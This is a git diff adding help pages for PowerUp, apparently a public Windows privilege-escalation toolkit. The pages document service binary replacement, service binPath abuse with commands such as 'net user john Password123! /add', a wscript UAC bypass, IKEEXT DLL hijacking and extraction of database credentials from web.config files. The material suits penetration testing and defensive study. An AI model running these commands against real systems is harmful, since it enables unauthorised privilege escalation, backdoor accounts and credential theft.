diff --git a/docs/Privesc/Get-UnquotedService.md b/docs/Privesc/Get-UnquotedService.md new file mode 100755 index 0000000..4b61355 --- /dev/null +++ b/docs/Privesc/Get-UnquotedService.md @@ -0,0 +1,45 @@ +# Get-UnquotedService + +## SYNOPSIS +Get-UnquotedService Returns the name and binary path for services with unquoted paths +that also have a space in the name. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ModifiablePath, Test-ServiceDaclPermission + +## SYNTAX + +``` +Get-UnquotedService +``` + +## DESCRIPTION +Uses Get-WmiObject to query all win32_service objects and extract out +the binary pathname for each. +Then checks if any binary paths have a space +and aren't quoted. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-UnquotedService +``` + +Get a set of potentially exploitable services. + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### PowerUp.UnquotedService + +## NOTES + +## RELATED LINKS + +[https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/trusted_service_path.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/trusted_service_path.rb) + diff --git a/docs/Privesc/Get-WebConfig.md b/docs/Privesc/Get-WebConfig.md new file mode 100755 index 0000000..78cef7d --- /dev/null +++ b/docs/Privesc/Get-WebConfig.md 
@@ -0,0 +1,93 @@ +# Get-WebConfig + +## SYNOPSIS +This script will recover cleartext and encrypted connection strings from all web.config +files on the system. +Also, it will decrypt them if needed. + +Author: Scott Sutherland, Antti Rantasaari +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-WebConfig +``` + +## DESCRIPTION +This script will identify all of the web.config files on the system and recover the +connection strings used to support authentication to backend databases. +If needed, the +script will also decrypt the connection strings on the fly. +The output supports the +pipeline which can be used to convert all of the results into a pretty table by piping +to format-table. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Return a list of cleartext and decrypted connect strings from web.config files. +``` + +Get-WebConfig + +user : s1admin +pass : s1password +dbserv : 192.168.1.103\server1 +vdir : C:\test2 +path : C:\test2\web.config +encr : No + +user : s1user +pass : s1password +dbserv : 192.168.1.103\server1 +vdir : C:\inetpub\wwwroot +path : C:\inetpub\wwwroot\web.config +encr : Yes + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Return a list of clear text and decrypted connect strings from web.config files. 
+``` + +Get-WebConfig | Format-Table -Autosize + +user pass dbserv vdir path encr +---- ---- ------ ---- ---- ---- +s1admin s1password 192.168.1.101\server1 C:\App1 C:\App1\web.config No +s1user s1password 192.168.1.101\server1 C:\inetpub\wwwroot C:\inetpub\wwwroot\web.config No +s2user s2password 192.168.1.102\server2 C:\App2 C:\App2\test\web.config No +s2user s2password 192.168.1.102\server2 C:\App2 C:\App2\web.config Yes +s3user s3password 192.168.1.103\server3 D:\App3 D:\App3\web.config No + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### System.Boolean + +System.Data.DataTable + +## NOTES +Below is an alterantive method for grabbing connection strings, but it doesn't support decryption. +for /f "tokens=*" %i in ('%systemroot%\system32\inetsrv\appcmd.exe list sites /text:name') do %systemroot%\system32\inetsrv\appcmd.exe list config "%i" -section:connectionstrings + +Author: Scott Sutherland - 2014, NetSPI +Author: Antti Rantasaari - 2014, NetSPI + +## RELATED LINKS + +[https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1 +http://www.netspi.com +https://raw2.github.com/NetSPI/cmdsql/master/cmdsql.aspx +http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe +http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx](https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1 +http://www.netspi.com +https://raw2.github.com/NetSPI/cmdsql/master/cmdsql.aspx +http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe +http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx) + diff --git a/docs/Privesc/Install-ServiceBinary.md b/docs/Privesc/Install-ServiceBinary.md new file mode 100755 index 0000000..bc75a2a --- /dev/null +++ b/docs/Privesc/Install-ServiceBinary.md 
@@ -0,0 +1,175 @@
+# Install-ServiceBinary
+
+## SYNOPSIS
+Replaces the service binary for the specified service with one that executes
+a specified command as SYSTEM.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-ServiceDetail, Get-ModifiablePath, Write-ServiceBinary
+
+## SYNTAX
+
+```
+Install-ServiceBinary [-Name] [-UserName ] [-Password ] [-LocalGroup ]
+ [-Credential ] [-Command ]
+```
+
+## DESCRIPTION
+Takes a esrvice Name or a ServiceProcess.ServiceController on the pipeline where the
+current user can modify the associated service binary listed in the binPath.
+Backs up
+the original service binary to "OriginalService.exe.bak" in service binary location,
+and then uses Write-ServiceBinary to create a C# service binary that either adds
+a local administrator user or executes a custom command.
+The new service binary is
+replaced in the original service binary path, and a custom object is returned that
+captures the original and new service binary configuration.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Install-ServiceBinary -Name VulnSVC
+```
+
+Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary
+for VulnSVC with one that adds a local Administrator (john/Password123!).
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-Service VulnSVC | Install-ServiceBinary
+```
+
+Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary
+for VulnSVC with one that adds a local Administrator (john/Password123!).
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Install-ServiceBinary -Name VulnSVC -UserName 'TESTLAB\john'
+```
+
+Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary
+for VulnSVC with one that adds TESTLAB\john to the Administrators local group.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+Install-ServiceBinary -Name VulnSVC -UserName backdoor -Password Password123!
+```
+
+Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary
+for VulnSVC with one that adds a local Administrator (backdoor/Password123!).
+
+### -------------------------- EXAMPLE 5 --------------------------
+```
+Install-ServiceBinary -Name VulnSVC -Command "net ..."
+```
+
+Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary
+for VulnSVC with one that executes a custom command.
+
+## PARAMETERS
+
+### -Name
+The service name the EXE will be running under.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ServiceName
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -UserName
+The \[domain\\\]username to add.
+If not given, it defaults to "john".
+Domain users are not created, only added to the specified localgroup.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: John
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Password
+The password to set for the added user.
+If not given, it defaults to "Password123!"
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Password123!
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LocalGroup
+Local group name to add the user to (default of 'Administrators').
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Administrators
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object specifying the user/password to add.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Command
+Custom command to execute instead of user creation.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerUp.ServiceBinary.Installed
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Privesc/Invoke-PrivescAudit.md b/docs/Privesc/Invoke-PrivescAudit.md
new file mode 100755
index 0000000..7110962
--- /dev/null
+++ b/docs/Privesc/Invoke-PrivescAudit.md
@@ -0,0 +1,63 @@
+# Invoke-PrivescAudit
+
+## SYNOPSIS
+Executes all functions that check for various Windows privilege escalation opportunities.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Invoke-PrivescAudit [-HTMLReport]
+```
+
+## DESCRIPTION
+Executes all functions that check for various Windows privilege escalation opportunities.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Invoke-PrivescAudit
+```
+
+Runs all escalation checks and outputs a status report for discovered issues.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Invoke-PrivescAudit -HTMLReport
+```
+
+Runs all escalation checks and outputs a status report to SYSTEM.username.html
+detailing any discovered issues.
+
+## PARAMETERS
+
+### -HTMLReport
+Switch.
+Write a HTML version of the report to SYSTEM.username.html.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### System.String
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Privesc/Invoke-ServiceAbuse.md b/docs/Privesc/Invoke-ServiceAbuse.md
new file mode 100755
index 0000000..8d493d7
--- /dev/null
+++ b/docs/Privesc/Invoke-ServiceAbuse.md
@@ -0,0 +1,194 @@
+# Invoke-ServiceAbuse
+
+## SYNOPSIS
+Abuses a function the current user has configuration rights on in order
+to add a local administrator or execute a custom command.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-ServiceDetail, Set-ServiceBinaryPath
+
+## SYNTAX
+
+```
+Invoke-ServiceAbuse [-Name] [-UserName ] [-Password ] [-LocalGroup ]
+ [-Credential ] [-Command ] [-Force]
+```
+
+## DESCRIPTION
+Takes a service Name or a ServiceProcess.ServiceController on the pipeline that the current
+user has configuration modification rights on and executes a series of automated actions to
+execute commands as SYSTEM.
+First, the service is enabled if it was set as disabled and the
+original service binary path and configuration state are preserved.
+Then the service is stopped
+and the Set-ServiceBinaryPath function is used to set the binary (binPath) for the service to a
+series of commands, the service is started, stopped, and the next command is configured.
+After
+completion, the original service configuration is restored and a custom object is returned
+that captures the service abused and commands run.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Invoke-ServiceAbuse -Name VulnSVC
+```
+
+Abuses service 'VulnSVC' to add a localuser "john" with password
+"Password123!
+to the machine and local administrator group
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-Service VulnSVC | Invoke-ServiceAbuse
+```
+
+Abuses service 'VulnSVC' to add a localuser "john" with password
+"Password123!
+to the machine and local administrator group
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Invoke-ServiceAbuse -Name VulnSVC -UserName "TESTLAB\john"
+```
+
+Abuses service 'VulnSVC' to add a the domain user TESTLAB\john to the
+local adminisrtators group.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+Invoke-ServiceAbuse -Name VulnSVC -UserName backdoor -Password password -LocalGroup "Power Users"
+```
+
+Abuses service 'VulnSVC' to add a localuser "backdoor" with password
+"password" to the machine and local "Power Users" group
+
+### -------------------------- EXAMPLE 5 --------------------------
+```
+Invoke-ServiceAbuse -Name VulnSVC -Command "net ..."
+```
+
+Abuses service 'VulnSVC' to execute a custom command.
+
+## PARAMETERS
+
+### -Name
+An array of one or more service names to abuse.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: ServiceName
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -UserName
+The \[domain\\\]username to add.
+If not given, it defaults to "john".
+Domain users are not created, only added to the specified localgroup.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: John
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Password
+The password to set for the added user.
+If not given, it defaults to "Password123!"
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Password123!
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LocalGroup
+Local group name to add the user to (default of 'Administrators').
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Administrators
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object specifying the user/password to add.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Command
+Custom command to execute instead of user creation.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Force
+Switch.
+Force service stopping, even if other services are dependent.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerUp.AbusedService
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Privesc/Invoke-WScriptUACBypass.md b/docs/Privesc/Invoke-WScriptUACBypass.md
new file mode 100755
index 0000000..f9eeb8d
--- /dev/null
+++ b/docs/Privesc/Invoke-WScriptUACBypass.md
@@ -0,0 +1,85 @@
+# Invoke-WScriptUACBypass
+
+## SYNOPSIS
+Performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe.
+
+Author: Matt Nelson (@enigma0x3), Will Schroeder (@harmj0y), Vozzie
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Invoke-WScriptUACBypass [-Command] [-WindowStyle ]
+```
+
+## DESCRIPTION
+Drops wscript.exe and a custom manifest into C:\Windows and then proceeds to execute
+VBScript using the wscript executable with the new manifest.
+The VBScript executed by
+C:\Windows\wscript.exe will run elevated.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+"
+```
+
+Launches the specified PowerShell encoded command in high-integrity.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Invoke-WScriptUACBypass -Command cmd.exe -WindowStyle 'Visible'
+```
+
+Spawns a high integrity cmd.exe.
+
+## PARAMETERS
+
+### -Command
+The shell command you want wscript.exe to run elevated.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: CMD
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -WindowStyle
+Whether to display or hide the window for the executed '-Command X'.
+Accepted values are 'Hidden' and 'Normal'/'Visible.
+Default is 'Hidden'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Hidden
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
+[http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html
+https://github.com/Vozzie/uacscript
+https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-WScriptBypassUAC.ps1](http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html
+https://github.com/Vozzie/uacscript
+https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-WScriptBypassUAC.ps1)
+
diff --git a/docs/Privesc/Restore-ServiceBinary.md b/docs/Privesc/Restore-ServiceBinary.md
new file mode 100755
index 0000000..a88fc29
--- /dev/null
+++ b/docs/Privesc/Restore-ServiceBinary.md
@@ -0,0 +1,87 @@
+# Restore-ServiceBinary
+
+## SYNOPSIS
+Restores a service binary backed up by Install-ServiceBinary.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-ServiceDetail, Get-ModifiablePath
+
+## SYNTAX
+
+```
+Restore-ServiceBinary [-Name] [[-BackupPath] ]
+```
+
+## DESCRIPTION
+Takes a service Name or a ServiceProcess.ServiceController on the pipeline and
+checks for the existence of an "OriginalServiceBinary.exe.bak" in the service
+binary location.
+If it exists, the backup binary is restored to the original
+binary path.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Restore-ServiceBinary -Name VulnSVC
+```
+
+Restore the original binary for the service 'VulnSVC'.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-Service VulnSVC | Restore-ServiceBinary
+```
+
+Restore the original binary for the service 'VulnSVC'.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Restore-ServiceBinary -Name VulnSVC -BackupPath 'C:\temp\backup.exe'
+```
+
+Restore the original binary for the service 'VulnSVC' from a custom location.
+
+## PARAMETERS
+
+### -Name
+The service name to restore a binary for.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ServiceName
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -BackupPath
+Optional manual path to the backup binary.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerUp.ServiceBinary.Installed
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Privesc/Set-ServiceBinaryPath.md b/docs/Privesc/Set-ServiceBinaryPath.md
new file mode 100755
index 0000000..b39926f
--- /dev/null
+++ b/docs/Privesc/Set-ServiceBinaryPath.md 
@@ -0,0 +1,92 @@
+# Set-ServiceBinaryPath
+
+## SYNOPSIS
+Sets the binary path for a service to a specified value.
+
+Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: PSReflect
+
+## SYNTAX
+
+```
+Set-ServiceBinaryPath [-Name] [-Path]
+```
+
+## DESCRIPTION
+Takes a service Name or a ServiceProcess.ServiceController on the pipeline and first opens up a
+service handle to the service with ConfigControl access using the GetServiceHandle
+Win32 API call.
+ChangeServiceConfig is then used to set the binary path (lpBinaryPathName/binPath)
+to the string value specified by binPath, and the handle is closed off.
+
+Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a
+Dacl field to each object.
+It does this by opening a handle with ReadControl for the
+service with using the GetServiceHandle Win32 API call and then uses
+QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Set-ServiceBinaryPath -Name VulnSvc -Path 'net user john Password123! /add'
+```
+
+Sets the binary path for 'VulnSvc' to be a command to add a user.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-Service VulnSvc | Set-ServiceBinaryPath -Path 'net user john Password123! /add'
+```
+
+Sets the binary path for 'VulnSvc' to be a command to add a user.
+
+## PARAMETERS
+
+### -Name
+An array of one or more service names to set the binary path for.
+Required.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: ServiceName
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Path
+The new binary path (lpBinaryPathName) to set for the specified service.
+Required.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: BinaryPath, binPath
+
+Required: True
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### System.Boolean
+
+$True if configuration succeeds, $False otherwise.
+
+## NOTES
+
+## RELATED LINKS
+
+[https://msdn.microsoft.com/en-us/library/windows/desktop/ms681987(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/windows/desktop/ms681987(v=vs.85).aspx)
+
diff --git a/docs/Privesc/Test-ServiceDaclPermission.md b/docs/Privesc/Test-ServiceDaclPermission.md
new file mode 100755
index 0000000..2251a11
--- /dev/null
+++ b/docs/Privesc/Test-ServiceDaclPermission.md
@@ -0,0 +1,112 @@
+# Test-ServiceDaclPermission
+
+## SYNOPSIS
+Tests one or more passed services or service names against a given permission set,
+returning the service objects where the current user have the specified permissions.
+
+Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: Add-ServiceDacl
+
+## SYNTAX
+
+```
+Test-ServiceDaclPermission [-Name] [-Permissions ] [-PermissionSet ]
+```
+
+## DESCRIPTION
+Takes a service Name or a ServiceProcess.ServiceController on the pipeline, and first adds
+a service Dacl to the service object with Add-ServiceDacl.
+All group SIDs for the current
+user are enumerated services where the user has some type of permission are filtered.
+The
+services are then filtered against a specified set of permissions, and services where the
+current user have the specified permissions are returned.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-Service | Test-ServiceDaclPermission
+```
+
+Return all service objects where the current user can modify the service configuration.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-Service | Test-ServiceDaclPermission -PermissionSet 'Restart'
+```
+
+Return all service objects that the current user can restart.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Test-ServiceDaclPermission -Permissions 'Start' -Name 'VulnSVC'
+```
+
+Return the VulnSVC object if the current user has start permissions.
+
+## PARAMETERS
+
+### -Name
+An array of one or more service names to test against the specified permission set.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: ServiceName, Service
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Permissions
+A manual set of permission to test again.
+One of:'QueryConfig', 'ChangeConfig', 'QueryStatus',
+'EnumerateDependents', 'Start', 'Stop', 'PauseContinue', 'Interrogate', UserDefinedControl',
+'Delete', 'ReadControl', 'WriteDac', 'WriteOwner', 'Synchronize', 'AccessSystemSecurity',
+'GenericAll', 'GenericExecute', 'GenericWrite', 'GenericRead', 'AllAccess'
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -PermissionSet
+A pre-defined permission set to test a specified service against.
+'ChangeConfig', 'Restart', or 'AllAccess'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: ChangeConfig
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### ServiceProcess.ServiceController
+
+## NOTES
+
+## RELATED LINKS
+
+[https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/](https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/)
+
diff --git a/docs/Privesc/Write-HijackDll.md b/docs/Privesc/Write-HijackDll.md
new file mode 100755
index 0000000..d38e3e7
--- /dev/null
+++ b/docs/Privesc/Write-HijackDll.md
@@ -0,0 +1,173 @@
+# Write-HijackDll
+
+## SYNOPSIS
+Patches in the path to a specified .bat (containing the specified command) into a
+pre-compiled hijackable C++ DLL writes the DLL out to the specified ServicePath location.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Write-HijackDll [-DllPath] [[-Architecture] ] [[-BatPath] ] [[-UserName] ]
+ [[-Password] ] [[-LocalGroup] ] [[-Credential] ] [[-Command] ]
+```
+
+## DESCRIPTION
+First builds a self-deleting .bat file that executes the specified -Command or local user,
+to add and writes the.bat out to -BatPath.
+The BatPath is then patched into a pre-compiled
+C++ DLL that is built to be hijackable by the IKEEXT service.
+There are two DLLs, one for
+x86 and one for x64, and both are contained as base64-encoded strings.
+The DLL is then
+written out to the specified OutputFile.
+
+## EXAMPLES
+
+### Example 1
+```
+PS C:\> {{ Add example code here }}
+```
+
+{{ Add example description here }}
+
+## PARAMETERS
+
+### -DllPath
+File name to write the generated DLL out to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Architecture
+The Architecture to generate for the DLL, x86 or x64.
+If not specified, PowerUp
+will try to automatically determine the correct architecture.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -BatPath
+Path to the .bat for the DLL to launch.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 3
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserName
+The \[domain\\\]username to add.
+If not given, it defaults to "john".
+Domain users are not created, only added to the specified localgroup.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 4
+Default value: John
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Password
+The password to set for the added user.
+If not given, it defaults to "Password123!"
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 5
+Default value: Password123!
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LocalGroup
+Local group name to add the user to (default of 'Administrators').
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 6
+Default value: Administrators
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object specifying the user/password to add.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 7
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Command
+Custom command to execute instead of user creation.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 8
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerUp.HijackableDLL
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Privesc/Write-ServiceBinary.md b/docs/Privesc/Write-ServiceBinary.md
new file mode 100755
index 0000000..7d588a5
--- /dev/null
+++ b/docs/Privesc/Write-ServiceBinary.md
@@ -0,0 +1,191 @@
+# Write-ServiceBinary
+
+## SYNOPSIS
+Patches in the specified command to a pre-compiled C# service executable and
+writes the binary out to the specified ServicePath location.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Write-ServiceBinary [-Name] [-UserName ] [-Password ] [-LocalGroup ]
+ [-Credential ] [-Command ] [-Path ]
+```
+
+## DESCRIPTION
+Takes a pre-compiled C# service binary and patches in the appropriate commands needed
+for service abuse.
+If a -UserName/-Password or -Credential is specified, the command
+patched in creates a local user and adds them to the specified -LocalGroup, otherwise
+the specified -Command is patched in.
+The binary is then written out to the specified
+-ServicePath.
+Either -Name must be specified for the service, or a proper object from
+Get-Service must be passed on the pipeline in order to patch in the appropriate service
+name the binary will be running under.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Write-ServiceBinary -Name VulnSVC
+```
+
+Writes a service binary to service.exe in the local directory for VulnSVC that
+adds a local Administrator (john/Password123!).
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-Service VulnSVC | Write-ServiceBinary
+```
+
+Writes a service binary to service.exe in the local directory for VulnSVC that
+adds a local Administrator (john/Password123!).
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Write-ServiceBinary -Name VulnSVC -UserName 'TESTLAB\john'
+```
+
+Writes a service binary to service.exe in the local directory for VulnSVC that adds
+TESTLAB\john to the Administrators local group.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+Write-ServiceBinary -Name VulnSVC -UserName backdoor -Password Password123!
+```
+
+Writes a service binary to service.exe in the local directory for VulnSVC that
+adds a local Administrator (backdoor/Password123!).
+
+### -------------------------- EXAMPLE 5 --------------------------
+```
+Write-ServiceBinary -Name VulnSVC -Command "net ..."
+```
+
+Writes a service binary to service.exe in the local directory for VulnSVC that
+executes a custom command.
+
+## PARAMETERS
+
+### -Name
+The service name the EXE will be running under.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ServiceName
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -UserName
+The \[domain\\\]username to add.
+If not given, it defaults to "john".
+Domain users are not created, only added to the specified localgroup.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: John
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Password
+The password to set for the added user.
+If not given, it defaults to "Password123!"
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Password123!
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LocalGroup
+Local group name to add the user to (default of 'Administrators').
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Administrators
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object specifying the user/password to add.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Command
+Custom command to execute instead of user creation.
+
